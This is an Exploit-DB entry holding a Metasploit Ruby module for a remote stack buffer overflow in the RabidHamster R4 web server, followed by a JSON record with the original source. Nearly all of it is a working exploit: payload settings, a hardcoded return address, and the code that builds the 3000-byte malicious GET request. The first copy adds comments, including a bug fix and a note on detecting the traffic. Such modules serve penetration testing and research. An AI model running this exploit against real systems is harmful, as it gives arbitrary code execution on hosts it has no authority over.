ID EDB-ID:18929 Type exploitdb Reporter metasploit Modified 2012-05-25T00:00:00
Description
RabidHamster R4 Log Entry sprintf() Buffer Overflow. Remote exploit for the Windows platform.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
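class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient

  # Module metadata for the RabidHamster R4 web-server log-entry overflow.
  #
  # @param info [Hash] metadata merged by the framework via update_info
  def initialize(info={})
    super(update_info(info,
      'Name'           => "RabidHamster R4 Log Entry sprintf() Buffer Overflow",
      'Description'    => %q{
          This module exploits a vulnerability found in RabidHamster R4's web server.
        By supplying a malformed HTTP request, it is possible to trigger a stack-based
        buffer overflow when generating a log, which may result in arbitrary code
        execution under the context of the user.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Luigi Auriemma', #Discovery, PoC
          'sinn3r'          #Metasploit
        ],
      'References'     =>
        [
          ['OSVDB', '79007'],
          ['URL', 'http://aluigi.altervista.org/adv/r4_1-adv.txt'],
          ['URL', 'http://secunia.com/advisories/47901/']
        ],
      'Payload'        =>
        {
          'StackAdjustment' => -3500,
          # Bytes excluded from the encoded payload; the module does not say why
          # these specific values are bad, so treat the set as empirical.
          'BadChars'        => "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x20"
        },
      'DefaultOptions' =>
        {
          'ExitFunction' => "process"
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['R4 v1.25', {'Ret'=>0x73790533}] #JMP ESI (ddraw.dll)
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Feb 09 2012",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptPort.new('RPORT', [true, 'The remote port', 8888])
      ], self.class)
  end

  # Fingerprints the service by its Server response header.
  #
  # @return [Exploit::CheckCode] Detected when the header reads
  #   'R4 Embedded Server', Safe otherwise (including when no response
  #   comes back).
  #
  # Fix: the original returned Exploit::CheckCoded::Safe (typo), so every
  # non-R4 host raised NameError instead of reporting Safe.
  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => '/'
    })

    if res && res.headers['Server'] == 'R4 Embedded Server'
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  # Sends the single GET request that triggers the overflow.
  #
  # The query string is built to a fixed 3000 bytes: encoded payload,
  # alphabetic padding up to 2022 bytes, the target return address,
  # a 200-byte pattern_create sequence, then alphabetic padding to 3000.
  # From a defender's view, that makes this traffic easy to flag: one GET
  # to the R4 port (8888 by default) whose query string is ~3000 bytes of
  # alphanumerics is well outside any legitimate request to this server,
  # so a request-length rule on a WAF/IDS covers it.
  def exploit
    buf = ''
    buf << payload.encoded
    buf << rand_text_alpha(2022-buf.length, payload_badchars)
    buf << [target.ret].pack("V*")
    buf << pattern_create(200)
    buf << rand_text_alpha(3000-buf.length, payload_badchars)

    send_request_cgi({
      'method' => 'GET',
      'uri'    => "/?#{buf}"
    })
  end
end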
{"id": "EDB-ID:18929", "hash": "05960aeb90c61e94874916d1508d5ea0", "type": "exploitdb", "bulletinFamily": "exploit", "title": "RabidHamster R4 Log Entry sprintf Buffer Overflow", "description": "RabidHamster R4 Log Entry sprintf() Buffer Overflow. Remote exploit for windows platform", "published": "2012-05-25T00:00:00", "modified": "2012-05-25T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/18929/", "reporter": "metasploit", "references": [], "cvelist": [], "lastseen": "2016-02-02T10:43:42", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 0.8, "vector": "NONE", "modified": "2016-02-02T10:43:42"}, "dependencies": {"references": [], "modified": "2016-02-02T10:43:42"}, "vulnersScore": 0.8}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/18929/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info={})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => \"RabidHamster R4 Log Entry sprintf() Buffer Overflow\",\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability found in RabidHamster R4's web server.\r\n\t\t\t\tBy supplying a malformed HTTP request, it is possible to trigger a stack-based\r\n\t\t\t\tbuffer overflow when generating a log, which may result in arbitrary code\r\n\t\t\t\texecution under the context of the user.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Luigi Auriemma', #Discovery, PoC\r\n\t\t\t\t\t'sinn3r' #Metasploit\r\n\t\t\t\t],\r\n\t\t\t'References' 
=>\r\n\t\t\t\t[\r\n\t\t\t\t\t['OSVDB', '79007'],\r\n\t\t\t\t\t['URL', 'http://aluigi.altervista.org/adv/r4_1-adv.txt'],\r\n\t\t\t\t\t['URL', 'http://secunia.com/advisories/47901/']\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t\t'BadChars' => \"\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\\x20\"\r\n\t\t\t\t},\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'ExitFunction' => \"process\"\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['R4 v1.25', {'Ret'=>0x73790533}] #JMP ESI (ddraw.dll)\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => \"Feb 09 2012\",\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOptPort.new('RPORT', [true, 'The remote port', 8888])\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\t\tres = send_request_cgi({\r\n\t\t\t'method' => 'GET',\r\n\t\t\t'uri' => '/'\r\n\t\t})\r\n\r\n\t\tif res and res.headers['Server'] == 'R4 Embedded Server'\r\n\t\t\treturn Exploit::CheckCode::Detected\r\n\t\telse\r\n\t\t\treturn Exploit::CheckCoded::Safe\r\n\t\tend\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tbuf = ''\r\n\t\tbuf << payload.encoded\r\n\t\tbuf << rand_text_alpha(2022-buf.length, payload_badchars)\r\n\t\tbuf << [target.ret].pack(\"V*\")\r\n\t\tbuf << pattern_create(200)\r\n\t\tbuf << rand_text_alpha(3000-buf.length, payload_badchars)\r\n\r\n\t\tsend_request_cgi({\r\n\t\t\t'method' => 'GET',\r\n\t\t\t'uri' => \"/?#{buf}\"\r\n\t\t})\r\n\tend\r\nend\r\n", "osvdbidlist": ["79007"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}